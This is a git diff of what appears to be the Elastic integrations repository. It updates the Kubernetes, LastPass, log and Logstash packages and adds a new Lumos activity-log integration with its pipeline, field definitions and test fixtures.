"2d715eff-85bb-431f-a5a6-3432b6a704a9": { - "customLabel": true, - "dataType": "string", - "isBucketed": false, - "label": "Type", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.service.type" - }, - "5288fb8d-2eec-4da6-a9e6-81e6ee0a429f": { - "customLabel": true, - "dataType": "string", - "isBucketed": false, - "label": "Namespace", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.namespace" - }, - "5bcc83c1-a9ef-4489-841c-e5c6e82f346b": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Service Name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.service.name" - }, - "8d4e5a02-d3f5-4960-b3a9-121f64d42ba6": { - "customLabel": true, - "dataType": "string", - "isBucketed": false, - "label": "Ingress IP", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.service.ingress_ip" - } - }, - "incompleteColumns": {} - } - } - } + "2d715eff-85bb-431f-a5a6-3432b6a704a9": { + "customLabel": true, + "dataType": "string", + "isBucketed": false, + "label": "Type", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.service.type" + }, + "5288fb8d-2eec-4da6-a9e6-81e6ee0a429f": { + "customLabel": true, + "dataType": "string", + "isBucketed": false, + "label": "Namespace", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.namespace" + }, + "5bcc83c1-a9ef-4489-841c-e5c6e82f346b": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Service Name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "009fece4-2d13-4c71-aeef-56c7288e17bf", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_service" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_service" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "columns": [ - { - "columnId": "5bcc83c1-a9ef-4489-841c-e5c6e82f346b", - "isTransposed": false - }, - { - "alignment": "right", - "columnId": "07f7d695-1388-41fb-a4fc-4bf13d299688", - "isTransposed": false - }, - { - "alignment": "right", - "columnId": "2d715eff-85bb-431f-a5a6-3432b6a704a9", - "isTransposed": false - }, - { - "alignment": "right", - "columnId": "226bd103-5a5d-4756-bbc5-2c7f5da03488", - "isTransposed": false - }, - { - "alignment": "right", - "columnId": "5288fb8d-2eec-4da6-a9e6-81e6ee0a429f", - "isTransposed": false - }, - { - "alignment": "right", - "columnId": "8d4e5a02-d3f5-4960-b3a9-121f64d42ba6", - "isTransposed": false - } - ], - "layerId": "15362d53-5f27-48a6-a339-8a5fc2c5339d", - "layerType": "data", - "rowHeight": "single", - "rowHeightLines": 1 - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.service.name" }, - "title": "Services Informations [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsDatatable" + "8d4e5a02-d3f5-4960-b3a9-121f64d42ba6": { + "customLabel": true, + "dataType": "string", + "isBucketed": false, + "label": "Ingress IP", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.service.ingress_ip" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "009fece4-2d13-4c71-aeef-56c7288e17bf", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_service" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 15, - "i": "3df5f644-b37e-471c-b2c5-ad4db122d1de", - "w": 48, - "x": 0, - "y": 4 - }, - "panelIndex": "3df5f644-b37e-471c-b2c5-ad4db122d1de", - "title": "Services Informations [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0-SNAPSHOT" - } - ], - "timeRestore": false, - "title": "[Metrics Kubernetes] Services", - "version": 1 - }, - "coreMigrationVersion": "8.6.0", - "created_at": "2023-01-11T14:25:08.717Z", - "id": "kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013", - "migrationVersion": { - "dashboard": "8.6.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "3df5f644-b37e-471c-b2c5-ad4db122d1de:indexpattern-datasource-layer-15362d53-5f27-48a6-a339-8a5fc2c5339d", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "3df5f644-b37e-471c-b2c5-ad4db122d1de:009fece4-2d13-4c71-aeef-56c7288e17bf", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "controlGroup_baa3640d-f954-4b56-ade6-01393a3991bc:optionsListDataView", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "controlGroup_5822d806-385b-435c-b83e-79e38e38fbb6:optionsListDataView", - "type": "index-pattern" + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_service" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "5bcc83c1-a9ef-4489-841c-e5c6e82f346b", + "isTransposed": false + }, + { + "alignment": "right", + "columnId": "07f7d695-1388-41fb-a4fc-4bf13d299688", + "isTransposed": false + }, + { + "alignment": "right", + "columnId": "2d715eff-85bb-431f-a5a6-3432b6a704a9", + "isTransposed": false + }, + { + "alignment": "right", + "columnId": "226bd103-5a5d-4756-bbc5-2c7f5da03488", + "isTransposed": false + }, + { + "alignment": "right", + "columnId": "5288fb8d-2eec-4da6-a9e6-81e6ee0a429f", + "isTransposed": false + }, + { + "alignment": "right", + "columnId": "8d4e5a02-d3f5-4960-b3a9-121f64d42ba6", + "isTransposed": false + } + ], + "layerId": "15362d53-5f27-48a6-a339-8a5fc2c5339d", + "layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1 + } + }, + "title": "Services Informations [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" }, - { - "id": "metrics-*", - "name": "controlGroup_c749b037-7a98-4555-822b-cb9a52395dbb:optionsListDataView", - "type": "index-pattern" - } + "title": "Services Informations [Metrics Kubernetes]" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Metrics Kubernetes] Services", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "3df5f644-b37e-471c-b2c5-ad4db122d1de:indexpattern-datasource-layer-15362d53-5f27-48a6-a339-8a5fc2c5339d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "3df5f644-b37e-471c-b2c5-ad4db122d1de:009fece4-2d13-4c71-aeef-56c7288e17bf", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_baa3640d-f954-4b56-ade6-01393a3991bc:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_5822d806-385b-435c-b83e-79e38e38fbb6:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_c749b037-7a98-4555-822b-cb9a52395dbb:optionsListDataView", + "type": "index-pattern" + } + ], + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/kubernetes/kibana/search/kubernetes-adc7d0c0-d1fc-11ec-8c69-8bbb7ca8f9ee.json b/packages/kubernetes/kibana/search/kubernetes-adc7d0c0-d1fc-11ec-8c69-8bbb7ca8f9ee.json deleted file mode 100644 index d17d85efaaa..00000000000 --- a/packages/kubernetes/kibana/search/kubernetes-adc7d0c0-d1fc-11ec-8c69-8bbb7ca8f9ee.json +++ /dev/null @@ -1,61 +0,0 @@ -{ - "attributes": { - "columns": [ - "kubernetes.event.type", - "kubernetes.event.reason", - "kubernetes.event.involved_object.kind", - "kubernetes.event.metadata.namespace", - "kubernetes.event.involved_object.name", - "message" - ], - "description": "Kubernetes Events", - "grid": { - "columns": { - "kubernetes.event.involved_object.kind": { - "width": 198.30555555555554 - }, - "kubernetes.event.metadata.namespace": { - "width": 249.83333333333337 - }, - "kubernetes.event.reason": { - "width": 176.33333333333331 - }, - "kubernetes.event.type": { - "width": 156.91666666666663 - } - } - }, - "hideChart": false, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "kuery", - "query": "event.dataset:kubernetes.event" - } - } - }, - "rowHeight": -1, - "sort": [ - [ - "@timestamp", - "desc" - ] - ], - "title": "Kubernetes Events [Metrics Kubernetes]" - }, - "coreMigrationVersion": "8.4.0", - "id": "kubernetes-adc7d0c0-d1fc-11ec-8c69-8bbb7ca8f9ee", - "migrationVersion": { - "search": "8.0.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - } - ], - "type": "search" -} \ No newline at end of file diff --git a/packages/kubernetes/manifest.yml b/packages/kubernetes/manifest.yml index 9e00e5cceb1..e5d02ebbf71 100644 --- a/packages/kubernetes/manifest.yml +++ b/packages/kubernetes/manifest.yml @@ -1,7 +1,7 @@ -format_version: 2.9.0 +format_version: 3.1.2 name: kubernetes title: Kubernetes -version: 1.56.0 +version: 1.58.0 description: Collect logs and metrics from Kubernetes clusters with Elastic Agent. type: integration categories: @@ -9,7 +9,8 @@ categories: - containers - kubernetes conditions: - kibana.version: "^8.12.0" + kibana: + version: "^8.12.0" screenshots: - src: /img/metricbeat_kubernetes_overview.png title: Metricbeat Kubernetes Overview @@ -237,3 +238,4 @@ policy_templates: type: image/png owner: github: elastic/obs-cloudnative-monitoring + type: elastic diff --git a/packages/lastpass/changelog.yml b/packages/lastpass/changelog.yml index bc46a171ce5..fe30f4e45d8 100644 --- a/packages/lastpass/changelog.yml +++ b/packages/lastpass/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.15.1" + changes: + - description: Fix page index for event reports. + type: bugfix + link: https://github.com/elastic/integrations/pull/9457 +- version: "1.15.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9127 - version: "1.14.2" changes: - description: Fix ingest pipeline conditional field handling. diff --git a/packages/lastpass/data_stream/event_report/agent/stream/httpjson.yml.hbs b/packages/lastpass/data_stream/event_report/agent/stream/httpjson.yml.hbs index b4b187d28b8..63eb1e75826 100644 --- a/packages/lastpass/data_stream/event_report/agent/stream/httpjson.yml.hbs +++ b/packages/lastpass/data_stream/event_report/agent/stream/httpjson.yml.hbs @@ -54,7 +54,7 @@ response.split: key_field: id cursor: last_time: - value: '[[if (eq .last_response.page 1)]][[formatDate (parseDate .last_response.body.data.Event1.Time "2006-01-02 15:04:05") "2006-01-02 15:04:05"]][[end]]' + value: '[[if (eq .last_response.page 0)]][[formatDate (parseDate .last_response.body.data.Event1.Time "2006-01-02 15:04:05") "2006-01-02 15:04:05"]][[end]]' tags: {{#if preserve_original_event}} - preserve_original_event diff --git a/packages/lastpass/manifest.yml b/packages/lastpass/manifest.yml index 0983c2a7dd2..7b4c572adc3 100644 --- a/packages/lastpass/manifest.yml +++ b/packages/lastpass/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: lastpass title: LastPass -version: "1.14.2" +version: "1.15.1" description: Collect logs from LastPass with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - credential_management conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 elastic: subscription: basic screenshots: @@ -56,6 +56,7 @@ policy_templates: title: Provisioning hash description: The API secret is also known as your provisioning hash, and is only displayed once it has been created. required: true + secret: true - name: proxy_url type: text title: Proxy URL diff --git a/packages/log/changelog.yml b/packages/log/changelog.yml index 6d2f2ce1c1e..7823b3d4d20 100644 --- a/packages/log/changelog.yml +++ b/packages/log/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "2.3.1" + changes: + - description: Enhance description of custom option + type: enhancement + link: https://github.com/elastic/integrations/pull/9386 - version: "2.3.0" changes: - description: Expose exclude_files option diff --git a/packages/log/manifest.yml b/packages/log/manifest.yml index 5af383a9661..c44f2b6ce44 100644 --- a/packages/log/manifest.yml +++ b/packages/log/manifest.yml @@ -4,7 +4,7 @@ title: Custom Logs description: >- Collect custom logs with Elastic Agent. type: input -version: 2.3.0 +version: 2.3.1 categories: - custom - custom_logs @@ -63,7 +63,7 @@ policy_templates: - name: custom title: Custom configurations description: > - Here YAML configuration options can be used to be added to your configuration. Be careful using this as it might break your configuration file. + Additional settings to be added to the configuration. Be careful using this as it might break the input as those settings are not validated and can override the settings specified above. See [`log` input settings docs](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-log.html) for details. type: yaml default: "" diff --git a/packages/logstash/_dev/build/docs/README.md b/packages/logstash/_dev/build/docs/README.md index 7b28ed0020c..2ca14b916f7 100644 --- a/packages/logstash/_dev/build/docs/README.md +++ b/packages/logstash/_dev/build/docs/README.md @@ -1,6 +1,8 @@ # Logstash -The `logstash` package collects metrics and logs of Logstash. +This integration collects logs and metrics from Logstash instances. + +You can find additional information about monitoring Logstash with the Logstash integration in the **Logstash Reference**: {{ url "logstash-monitoring-ea" "Monitoring Logstash with Elastic Agent" }}. ## Compatibility diff --git a/packages/logstash/_dev/deploy/docker/docker-compose.yml b/packages/logstash/_dev/deploy/docker/docker-compose.yml index 51d81ff21fa..635700be158 100644 --- a/packages/logstash/_dev/deploy/docker/docker-compose.yml +++ b/packages/logstash/_dev/deploy/docker/docker-compose.yml @@ -2,10 +2,20 @@ version: "2.3" services: logstash: user: root - image: "docker.elastic.co/logstash/logstash:${ELASTIC_VERSION:-8.6.0}" + image: "docker.elastic.co/logstash/logstash:${ELASTIC_VERSION:-8.7.0}" + healthcheck: + test: ["CMD", "curl", "-f", "-u", "elastic:changeme", "http://127.0.0.1:9600/"] + retries: 300 + interval: 1s volumes: - "./pipeline:/usr/share/logstash/pipeline" - "./config:/usr/share/logstash/config" - ${SERVICE_LOGS_DIR}:/usr/share/logstash/logs ports: - "127.0.0.1:9600:9600" + logstash_is_ready: + image: tianon/true + platform: linux/amd64 + depends_on: + logstash: + condition: service_healthy diff --git a/packages/logstash/_dev/deploy/variants.yml b/packages/logstash/_dev/deploy/variants.yml index 5b5dafe86f5..f3861a8841d 100644 --- a/packages/logstash/_dev/deploy/variants.yml +++ b/packages/logstash/_dev/deploy/variants.yml @@ -1,4 +1,4 @@ variants: - logstash_8.6.0: - ELASTIC_VERSION: 8.6.0 -default: logstash_8.6.0 + logstash_8.7.0: + ELASTIC_VERSION: 8.7.0 +default: logstash_8.7.0 diff --git a/packages/logstash/changelog.yml b/packages/logstash/changelog.yml index e46311596fe..6775dcdba85 100644 --- a/packages/logstash/changelog.yml +++ b/packages/logstash/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "2.4.3" + changes: + - description: Add missing queue.capacity.* mappings + type: bugfix + link: https://github.com/elastic/integrations/pull/9339 +- version: "2.4.2" + changes: + - description: Add link to Logstash monitoring docs + type: enhancement + link: https://github.com/elastic/integrations/pull/9183 - version: "2.4.1" changes: - description: Add missing host.ip field mapping diff --git a/packages/logstash/data_stream/node_stats/fields/fields.yml b/packages/logstash/data_stream/node_stats/fields/fields.yml index 1c23b97818e..b0dde764dc5 100644 --- a/packages/logstash/data_stream/node_stats/fields/fields.yml +++ b/packages/logstash/data_stream/node_stats/fields/fields.yml @@ -182,6 +182,17 @@ type: long - name: max_queue_size_in_bytes type: long + - name: capacity + type: group + fields: + - name: max_queue_size_in_bytes + type: long + - name: max_unread_events + type: long + - name: page_capacity_in_bytes + type: long + - name: queue_size_in_bytes + type: long - name: pipelines.events type: group fields: diff --git a/packages/logstash/docs/README.md b/packages/logstash/docs/README.md index 661dbd7d549..b968d8ad0e1 100644 --- a/packages/logstash/docs/README.md +++ b/packages/logstash/docs/README.md @@ -1,6 +1,8 @@ # Logstash -The `logstash` package collects metrics and logs of Logstash. +This integration collects logs and metrics from Logstash instances. + +You can find additional information about monitoring Logstash with the Logstash integration in the **Logstash Reference**: [Monitoring Logstash with Elastic Agent](https://www.elastic.co/guide/en/logstash/current/monitoring-with-ea.html). ## Compatibility diff --git a/packages/logstash/manifest.yml b/packages/logstash/manifest.yml index 8f6d39b5de3..6368ddcad3d 100644 --- a/packages/logstash/manifest.yml +++ b/packages/logstash/manifest.yml @@ -1,6 +1,6 @@ name: logstash title: Logstash -version: 2.4.1 +version: 2.4.3 description: Collect logs and metrics from Logstash with Elastic Agent. type: integration icons: diff --git a/packages/lumos/_dev/build/build.yml b/packages/lumos/_dev/build/build.yml new file mode 100644 index 00000000000..2bfcfc223b0 --- /dev/null +++ b/packages/lumos/_dev/build/build.yml @@ -0,0 +1,3 @@ +dependencies: + ecs: + reference: "git@v8.11.0" diff --git a/packages/lumos/_dev/build/docs/README.md b/packages/lumos/_dev/build/docs/README.md new file mode 100644 index 00000000000..97a3fe4bead --- /dev/null +++ b/packages/lumos/_dev/build/docs/README.md @@ -0,0 +1,31 @@ +# Lumos Integration + +The Lumos integration uses [Lumos' API](https://api.lumos.com/) to retrieve Activity Logs and ingest them into Elasticsearch. This allows you to search, observe, and visualize the Activity Logs through Elasticsearch. + +The Elastic agent running this integration interacts with Lumos' infrastructure using their APIs to retrieve [Activity Logs](https://api.lumos.com/activity_logs) for a Lumos tenant. + +## Configuration + +### Enabling the integration in Elastic + +1. In Kibana go to **Management > Integrations** +2. In the "Search for integrations" search bar type **Lumos**. +3. Click on "Lumos" integration from the search results. +4. Click on **Add Lumos** button to add Lumos integration. + +### Configure Lumos Activity Logs data stream + +1. In Lumos go to **Settings > API Tokens** +2. Click on "Add API Token", enter a name and description +3. Copy the key starting with `lsk_` +4. While adding Lumos integration in Elastic, paste your key into the `API Token` field + +## Logs + +### Activity Logs + +Activity Logs summarize the history of changes and events occurring within Lumos. + +{{fields "activity_logs"}} + +{{event "activity_logs"}} \ No newline at end of file diff --git a/packages/lumos/_dev/deploy/docker/docker-compose.yml b/packages/lumos/_dev/deploy/docker/docker-compose.yml new file mode 100644 index 00000000000..a55e2478878 --- /dev/null +++ b/packages/lumos/_dev/deploy/docker/docker-compose.yml @@ -0,0 +1,15 @@ +version: '3.0' +services: + lumos: + image: docker.elastic.co/observability/stream:v0.11.0 + hostname: lumos + ports: + - 8080 + volumes: + - ./files:/files:ro + environment: + PORT: 8080 + command: + - http-server + - --addr=:8080 + - --config=/files/config.yml diff --git a/packages/lumos/_dev/deploy/docker/files/config.yml b/packages/lumos/_dev/deploy/docker/files/config.yml new file mode 100644 index 00000000000..ce71d6fe4a6 --- /dev/null +++ b/packages/lumos/_dev/deploy/docker/files/config.yml @@ -0,0 +1,42 @@ +rules: + - path: /activity_logs + methods: ["GET"] + request_headers: + authorization: Bearer xoxp-1234567890 + responses: + - status_code: 200 + body: |- + { + "items": [ + { + "actor": { + "actor_type": "Lumos user", + "email": "wile.e.coyote@lumos.com", + "family_name": "Wile", + "given_name": "Coyote" + }, + "event_began_at": "2024-03-12T16:09:14", + "event_hash": "630b90cedc35a8a5f43361534099bee51e032f42dd442085fc76ef094d228f543c78fbe59c132df992cf71a6b8496504e8ebbc6020fbae1f34206676985412e7", + "event_metadata": {}, + "event_type": "SOD_POLICY_DELETED", + "event_type_user_friendly": "A user deleted a SOD Policy", + "outcome": "Succeeded", + "targets": [ + { + "name": "Untitled Rule", + "target_type": "SOD Policy" + } + ] + } + ], + "limit": 50, + "links": { + "first": "/activity_logs?offset=0", + "last": "/activity_logs?offset=1", + "next": null, + "prev": null, + "self": "/activity_logs" + }, + "offset": 0, + "total": 1 + } diff --git a/packages/lumos/changelog.yml b/packages/lumos/changelog.yml new file mode 100644 index 00000000000..e39cfe34645 --- /dev/null +++ b/packages/lumos/changelog.yml @@ -0,0 +1,6 @@ +# newer versions go on top +- version: "0.1.0" + changes: + - description: Initial draft of the package + type: enhancement + link: https://github.com/elastic/integrations/pull/9276 diff --git a/packages/lumos/data_stream/activity_logs/_dev/test/pipeline/test-activity-logs.log b/packages/lumos/data_stream/activity_logs/_dev/test/pipeline/test-activity-logs.log new file mode 100644 index 00000000000..6fdea9e9798 --- /dev/null +++ b/packages/lumos/data_stream/activity_logs/_dev/test/pipeline/test-activity-logs.log @@ -0,0 +1,2 @@ +{"actor":{"actor_type":"Lumos user","email":"wile.e.coyote@lumos.com","family_name":"Wile","given_name":"Coyote"},"event_began_at":"2024-03-12T16:09:14","event_hash":"630b90cedc35a8a5f43361534099bee51e032f42dd442085fc76ef094d228f543c78fbe59c132df992cf71a6b8496504e8ebbc6020fbae1f34206676985412e7","event_metadata":{},"event_type":"SOD_POLICY_DELETED","event_type_user_friendly":"A user deleted a SOD Policy","outcome":"Succeeded","targets":[{"name":"Untitled Rule","target_type":"SOD Policy"}]} +{"actor":{"actor_type":"Lumos user","email":"wile.e.coyote@lumos.com","family_name":"Wile","given_name":"Coyote"},"event_began_at":"2024-03-12T16:09:14","event_hash":"630b90cedc35a8a5f43361534099bee51e032f42dd442085fc76ef094d228f543c78fbe59c132df992cf71a6b8496504e8ebbc6020fbae1f34206676985412e7","event_metadata":{},"event_type":"SOD_POLICY_DELETED","event_type_user_friendly":"A user deleted a SOD Policy","outcome":"Succeeded","targets":[]} diff --git a/packages/lumos/data_stream/activity_logs/_dev/test/pipeline/test-activity-logs.log-expected.json b/packages/lumos/data_stream/activity_logs/_dev/test/pipeline/test-activity-logs.log-expected.json new file mode 100644 index 00000000000..a4caf105880 --- /dev/null +++ b/packages/lumos/data_stream/activity_logs/_dev/test/pipeline/test-activity-logs.log-expected.json @@ -0,0 +1,60 @@ +{ + "expected": [ + { + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "SOD_POLICY_DELETED", + "id": "630b90cedc35a8a5f43361534099bee51e032f42dd442085fc76ef094d228f543c78fbe59c132df992cf71a6b8496504e8ebbc6020fbae1f34206676985412e7", + "outcome": "success", + "type": "info", + "kind": "event" + }, + "lumos": { + "activity_logs": { + "actor": { + "actor_type": "Lumos user", + "email": "wile.e.coyote@lumos.com", + "family_name": "Wile", + "given_name": "Coyote" + }, + "event_began_at": "2024-03-12T16:09:14", + "event_type_user_friendly": "A user deleted a SOD Policy", + "targets": [ + { + "name": "Untitled Rule", + "target_type": "SOD Policy" + } + ] + } + }, + "message": "{\"actor\":{\"actor_type\":\"Lumos user\",\"email\":\"wile.e.coyote@lumos.com\",\"family_name\":\"Wile\",\"given_name\":\"Coyote\"},\"event_began_at\":\"2024-03-12T16:09:14\",\"event_hash\":\"630b90cedc35a8a5f43361534099bee51e032f42dd442085fc76ef094d228f543c78fbe59c132df992cf71a6b8496504e8ebbc6020fbae1f34206676985412e7\",\"event_metadata\":{},\"event_type\":\"SOD_POLICY_DELETED\",\"event_type_user_friendly\":\"A user deleted a SOD Policy\",\"outcome\":\"Succeeded\",\"targets\":[{\"name\":\"Untitled Rule\",\"target_type\":\"SOD Policy\"}]}" + }, + { + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "SOD_POLICY_DELETED", + "id": "630b90cedc35a8a5f43361534099bee51e032f42dd442085fc76ef094d228f543c78fbe59c132df992cf71a6b8496504e8ebbc6020fbae1f34206676985412e7", + "outcome": "success", + "type": "info", + "kind": "event" + }, + "lumos": { + "activity_logs": { + "actor": { + "actor_type": "Lumos user", + "email": "wile.e.coyote@lumos.com", + "family_name": "Wile", + "given_name": "Coyote" + }, + "event_began_at": "2024-03-12T16:09:14", + "event_type_user_friendly": "A user deleted a SOD Policy" + } + }, + "message": "{\"actor\":{\"actor_type\":\"Lumos user\",\"email\":\"wile.e.coyote@lumos.com\",\"family_name\":\"Wile\",\"given_name\":\"Coyote\"},\"event_began_at\":\"2024-03-12T16:09:14\",\"event_hash\":\"630b90cedc35a8a5f43361534099bee51e032f42dd442085fc76ef094d228f543c78fbe59c132df992cf71a6b8496504e8ebbc6020fbae1f34206676985412e7\",\"event_metadata\":{},\"event_type\":\"SOD_POLICY_DELETED\",\"event_type_user_friendly\":\"A user deleted a SOD Policy\",\"outcome\":\"Succeeded\",\"targets\":[]}" + } + ] +} \ No newline at end of file diff --git a/packages/lumos/data_stream/activity_logs/_dev/test/system/test-default-config.yml b/packages/lumos/data_stream/activity_logs/_dev/test/system/test-default-config.yml new file mode 100644 index 00000000000..38880e3f5aa --- /dev/null +++ b/packages/lumos/data_stream/activity_logs/_dev/test/system/test-default-config.yml @@ -0,0 +1,9 @@ +input: httpjson +service: lumos +vars: + api_url: http://{{Hostname}}:{{Port}} +data_stream: + vars: + api_token: xoxp-1234567890 +assert: + hit_count: 1 diff --git a/packages/lumos/data_stream/activity_logs/agent/stream/httpjson.yml.hbs b/packages/lumos/data_stream/activity_logs/agent/stream/httpjson.yml.hbs new file mode 100644 index 00000000000..57fffa6cfed --- /dev/null +++ b/packages/lumos/data_stream/activity_logs/agent/stream/httpjson.yml.hbs @@ -0,0 +1,31 @@ +config_version: "2" +interval: {{interval}} +request.method: "GET" +request.url: {{api_url}}/activity_logs + +{{#if http_client_timeout}} +request.timeout: {{http_client_timeout}} +{{/if}} + +request.transforms: + - set: + target: header.Authorization + value: "Bearer {{api_token}}" + +response.pagination: + - set: + target: url.value + value: '{{api_url}}[[.last_response.body.links.next]]' + fail_on_template_error: true + +response.split: + target: body.items + +cursor: + since: + value: '[[.last_event.created]]' + +{{#if processors}} +processors: +{{processors}} +{{/if}} diff --git a/packages/lumos/data_stream/activity_logs/elasticsearch/ingest_pipeline/default.yml b/packages/lumos/data_stream/activity_logs/elasticsearch/ingest_pipeline/default.yml new file mode 100644 index 00000000000..648d7b43563 --- /dev/null +++ b/packages/lumos/data_stream/activity_logs/elasticsearch/ingest_pipeline/default.yml @@ -0,0 +1,68 @@ +--- +description: Pipeline for processing Lumos Activity Logs +processors: + - set: + field: ecs.version + value: 8.11.0 + - json: + field: message + target_field: lumos.activity_logs + - rename: + field: lumos.activity_logs.event_hash + target_field: event.id + ignore_missing: true + - rename: + field: lumos.activity_logs.event_type + target_field: event.action + ignore_missing: true + - rename: + field: lumos.activity_logs.outcome + target_field: event.outcome + ignore_missing: true + - set: + field: event.outcome + value: unknown + if: (ctx.event.outcome != "Failed") && (ctx.event.outcome != "Succeeded") + - set: + field: event.outcome + value: failure + if: ctx.event.outcome == "Failed" + - set: + field: event.outcome + value: success + if: ctx.event.outcome == "Succeeded" + - set: + field: event.kind + value: event + - set: + field: event.type + value: info + - script: + description: Drops null/empty values recursively + lang: painless + ignore_failure: true + source: | + boolean drop(Object o) { + if (o == null || o == "") { + return true; + } else if (o instanceof Map) { + ((Map) o).values().removeIf(v -> drop(v)); + return (((Map) o).size() == 0); + } else if (o instanceof List) { + ((List) o).removeIf(v -> drop(v)); + return (((List) o).length == 0); + } + return false; + } + drop(ctx); +on_failure: + - append: + field: error.message + value: >- + Processor {{{_ingest.on_failure_processor_type}}} with tag + {{{_ingest.on_failure_processor_tag}}} in pipeline + {{{_ingest.on_failure_pipeline}}} failed with message: + {{{_ingest.on_failure_message}}} + - set: + field: event.kind + value: pipeline_error diff --git a/packages/lumos/data_stream/activity_logs/fields/base-fields.yml b/packages/lumos/data_stream/activity_logs/fields/base-fields.yml new file mode 100644 index 00000000000..d1d44fd3da9 --- /dev/null +++ b/packages/lumos/data_stream/activity_logs/fields/base-fields.yml @@ -0,0 +1,16 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: event.module + type: constant_keyword + description: Event module + value: lumos +- name: "@timestamp" + type: date + description: Event timestamp. diff --git a/packages/lumos/data_stream/activity_logs/fields/ecs.yml b/packages/lumos/data_stream/activity_logs/fields/ecs.yml new file mode 100644 index 00000000000..553d3da3148 --- /dev/null +++ b/packages/lumos/data_stream/activity_logs/fields/ecs.yml @@ -0,0 +1,4 @@ +- external: ecs + name: ecs.version +- external: ecs + name: message diff --git a/packages/lumos/data_stream/activity_logs/fields/fields.yml b/packages/lumos/data_stream/activity_logs/fields/fields.yml new file mode 100644 index 00000000000..763d709168a --- /dev/null +++ b/packages/lumos/data_stream/activity_logs/fields/fields.yml @@ -0,0 +1,39 @@ +- name: input.type + type: keyword + description: Input type +- name: event.id + type: keyword + description: The event hash +- name: event.created + type: date + description: The time the event began +- name: event.action + type: keyword + description: The activity that occurred +- name: event.outcome + type: keyword + description: The outcome of the event, whether it succeeded or failed +- name: lumos.activity_logs.actor.actor_type + type: keyword + description: The type of actor +- name: lumos.activity_logs.actor.email + type: keyword + description: The email of the actor +- name: lumos.activity_logs.actor.family_name + type: keyword + description: The family name of the actor +- name: lumos.activity_logs.actor.given_name + type: keyword + description: The given name of the actor +- name: lumos.activity_logs.event_type_user_friendly + type: keyword + description: The user friendly type of the event +- name: lumos.activity_logs.event_began_at + type: keyword + description: The time the event began 